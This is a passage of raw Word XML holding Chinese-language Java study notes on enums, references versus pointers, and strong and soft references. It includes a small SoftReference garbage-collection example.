          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>FreshJuice.FreshJuiceSize.MEDIUM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  ;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="670B896D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">   }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40A4121C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71578B25" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注意：枚举可以单独声明或者声明在类里面。方法、变量、构造函数也可以在枚举中定义。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4681F584" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02B4922A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6457F420" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D3D698A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58068B8D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E2497D0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CE0B625" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43B86A08" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14C87E6A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>引用和指针</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AA66340" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>引用和指针的区别：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>https://blog.csdn.net/sinat_40959511/article/details/80217003</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C3A77AD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A0DF121" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>引用声明没实体，可以变字符串看。指针是个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，可以加减</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43E84B31" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>引用不会内存泄露，因为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>GC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>；指针容易导致内存泄露，需要及时回收</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4199663A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>引用传参到函数没有意义只是值的拷贝，但是函数内可以修稿引用的对象的属性；指针传入会直接更改地址。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34F3873A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D9792D5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3AE9029F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18165060" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B1638B6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>引用：强</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>软</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>弱</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>虚</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E8A5CB0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D1272BF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>https://zhuanlan.zhihu.com/p/57452267</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77C90D08" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>只有强引用</w:t>
      </w:r>
      <w:r>
        <w:t>FinalReference</w:t>
      </w:r>
      <w:r>
        <w:t>类是包内可见，其他三种引用类型均为</w:t>
      </w:r>
      <w:r>
        <w:t>public</w:t>
      </w:r>
      <w:r>
        <w:t>，可以在应用程序中直接使用。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7705F1A6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>强</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>引用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A147659" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>StringBuffer stringBuffer = new StringBuffer("Helloword");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E0D16B7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="172D30EA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>强引用可以</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>直接访问目标对象</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BBA50F5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>强引用所指向的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>对象在任何时候都不会被系统回收</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>JVM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>宁愿抛出</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>OOM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>异常，也不会回收强引用所指向的对象。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75C09992" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>强引用可能导致内存泄漏。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78D07CAF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>软</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>引用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="714C2F25" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>软引用是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>除了强引用外，最强</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的引用类型。可以通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>java.lang.ref.SoftReference</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用软引用。一个持有软引用的对象，不会被</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>JVM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>很快回收，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>JVM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>会根据当前堆的使用情况来判断何时回收。当堆使用率临近阈值时，才会去回收软引用的对象</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。因此，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>软引用可以用于实现对内存敏感的高速缓存。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12B99C19" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75A63615" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SoftReference</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的特点是它的一个实例保存对一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对象的软引用，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>该软引用的存在不妨碍垃圾收集线程对该</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对象的回收。也就是说，一旦</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SoftReference</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>保存了对一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对象的软引用后，在垃圾线程对</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对象回收前，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SoftReference</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类所提供的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>get()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法返回</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对象的强引用。一旦垃圾线程回收该</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对象之后，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>get()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法将返回</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0475BD04" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33E0FFD2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>下面举一个例子说明软引用的使用方法。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59C2EC0F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在你的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IDE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>设置参数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> -Xmx2m -Xms2m</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>规定堆内存大小为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2m</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E6F44F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>@Test</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28375404" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>public void test3(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D9EE4B5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MyObject obj = new myObject();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03B8E9FF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">SoftReference sf = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>new SoftReference&lt;&gt;(obj);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67F58106" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>obj = null;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5063B585" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>System.gc();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C379034" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>// byte[] bytes = new byte[1024*100];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AA3C90D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>// System.gc();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1864A701" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>System.out.println("</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是否被回收</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>"+sf.get());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68679C70" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69E9750A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C3BE03E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>运行结果：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60167BAB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59934475" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是否被回收</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cn.zyzpp.MyObject@42110406</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01B62795" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="441921E5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>打开被注释掉的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>new byte[1024*100]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语句，这条语句请求一块大的堆空间，使堆内存使用紧张。并显式的再调用一次</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>GC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，结果如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="133632D3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
